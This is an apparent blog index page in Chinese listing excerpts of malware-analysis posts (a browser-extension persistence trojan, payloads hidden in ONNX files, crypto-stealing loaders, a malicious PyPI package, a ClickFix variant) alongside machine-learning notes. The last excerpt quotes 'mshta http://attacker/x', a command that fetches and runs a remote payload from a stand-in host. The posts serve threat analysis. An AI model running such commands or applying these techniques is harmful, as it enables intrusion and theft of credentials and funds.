Closure's Blog

为什么这个房间会烧起来呢?

NMH持久化木马样本分析

还原的代码在这里 本来是结论的但是还是写在前面吧。。。整套手法里真正不可替代的只有宿主进程由Chrome拉起,进程链上是合法签名二进制当父进程,以及扩展位收割内存态,像明文账密/活动会话cookie/页面指纹这些数据只有坐在浏览器里才拿得到,磁盘上的加密数据库里没有。 在我评判标准里属于是标准的奇技淫巧了,这个留下的动作链很长,而且持久化有更便宜的,毕竟偷浏览器数据可以纯EXE读...

往ONNX模型文件塞恶意代码

这一套就是把容器格式的宽容性变成攻击面,格式合法性与语义可信度之间的差就是我们载荷的空间,ONNX是本质是protobuf(后面会展开来讲),能被解析不等于内容被消费,官方API只保证字段编码正确、ir_version/opset兼容/graph 能构建/输出可达性之外的一切字段都不影响推理,但是会被原样保留。 而且现在模型动辄几十MB到GB,几MD的冗余荷载不显眼,随机权重熵7.99–8...

盗币加载器分析(1):一个wasm加载器的bootstrap

这套盗u系统是按商品形态交付的 MaaS,主打的是开箱即卖,代理分润制,引流代理负责把链接送到受害者眼前,平台记账,在偷到钱后系统按比例自动给渠道分润。 卖家对自己的保护比php前端水平高很多,网关AES盐硬编码在源码里且与客户端插件编译期绑定,插件内焊死网关域名/盐/渠道号三样东西,以及这个包是刻意阉割过的缺越狱插件 jbsdk/6个远程拉取模块/Proxy打款 综上,这套平台有两...

三条压缩边界:stem、深度、分辨率

做消融做的比较少,遇到了很多遇不到的问题….其实是api/网页端会员同时到期了当时又懒得续(已经续上了),所以这篇代码和古法cot含量很高 因为是3D nnUNet加上一次训练上千epoch,消融和主实验抢同一个槽位,我每次实验都是一次完整的1000epoch 3D fullres训练+备份+三重验证,在这种预算下可想而知…. 而且-p参数搞混覆盖过别人的实验/旧版会清空输出目录/pla...

在浏览器里就完成组装的恶意代码

这条链也没用上什么漏洞和比较高深的技术,只是把投递这个动作从运输成品改成了运输图纸,恶意软件投递的是网络上存在一个完整的坏文件,所有检测手段像哈希黑名单/流量特征/沙箱下载分析都建立在能拿到这个文件的前提上。 SourTrade落地页只下发一份config组装说明书,包含随机AES-CTR种子、尺寸、字节配方,浏览器拿着说明书去第二域名拉一份干净的Bun官方运行时,再由页面内嵌字符串现造的...

硬件能表示什么,算法需要什么

我对医学一窍不通! 这个项目里所有出血亚型的缩写,硬膜外、脑实质内、脑室内、蛛网膜下腔、硬膜下,我到现在也没真正搞懂它们在解剖学上到底怎么区分,看片子完全看不懂。 负责的只有机器学习那一块,至于这些类别在临床上意味着什么,为什么某一类特别难分,我基本只能转述文献里的说法………… 文中用到的数据是公开数据集,本身已经过脱敏处理,具体的实验数值我也不会放( 适合在做光学/模拟计算硬件,但...

没有Payload的恶意包-Shai-Hulud

langchain-core-mcp-loader源码 _index.js 最近针对PyPI的供应链攻击,涵盖范围主要是生物信息学包和AI/MCP主题包,还有常见的名字仿冒包以及langchain-core-mcp加载器变种,之前分析的样本包都是从index.js加载payload,这个是通过搜索sys.path来发现运行。 之前拿到的恶意包都是一包一功能,Wheel里面直接放in...

MXC(Microsoft Execution Containers)

MXC是微软在Build 2026发布的一个策略驱动的沙箱执行层,架在Windows现有隔离原语之上的统一抽象,用一份JSON policy声明约束,MXC负责翻译成对应的OS级强制。 是专门为现在普及度很高的AI agent 设计的,coding agent来执行模型生成的代码,desktop agent操作本地文件和应用,核心假设是这些agent会在运行时动态生成不可信代码,需要在执行...

Token-In,Token-Out

更推荐读1下原文,我只是围绕原文记点笔记/找点自己能用的:https://qgallouedec-tito.hf.space/#decoding-doesnt-undo-encoding 很喜欢看这种很窄很底层的技术,可以说是【用强化学习训练能调用工具的LLM这条流水线】里的一个正确性零件,我们在用RL训练一个agent,而这个agent需要在rollout中途调用工具,这就是这套方法存...

cmdkey凭据预置绕过企业HTTP代理的新ClickFix

前几代的ClickFix用的都是PowerShell/rundll32和WebDAV,已经有了LOLBin,但是还没有凭据预置这一步,前面做的仍然只是下载和执行两件事。 四月的新ClickFix用上了cmdkey和regsvr32还有远程计划任务,总而言之是更针对企业环境的…..之前的大多数都会被检测到,就算是用来mshta http://… mshta http://attacker/x...